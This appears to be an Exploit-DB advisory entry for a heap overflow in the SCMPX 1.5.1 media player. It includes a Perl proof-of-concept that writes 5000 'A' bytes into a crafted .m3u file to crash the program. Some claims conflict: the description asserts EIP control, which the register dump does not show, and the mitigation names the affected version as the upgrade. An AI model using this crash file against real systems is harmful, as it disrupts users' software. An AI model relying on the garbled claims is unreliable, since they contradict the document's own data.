SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC

vendor:

SCMPX

by:

HACK4LOVE

7,8

CVSS

HIGH

Heap Overflow

122

CWE

Product Name: SCMPX

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC

SCMPX 1.5.1 is vulnerable to a local heap overflow vulnerability. By creating a specially crafted .m3u file with 5000 'A' characters, an attacker can overwrite the EIP register and control the execution flow of the application.

Mitigation:

Upgrade to the latest version of SCMPX 1.5.1

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# ###############################################################################
# SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC
# ###############################################################################

# Found By :: HACK4LOVE

## Olly registers
#EAX 00A71FF8
#ECX 41414141 _____>>control over the register
#EDX 41414141
#EBX 00000180
#ESP 0012E758
#EBP 0012E778
#ESI 00000008
#EDI 00000017
#EIP 00465B25 SCMPX.00465B25
##################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.M3U');
print myfile $crash;
##################################################################################

# milw0rm.com [2009-06-29]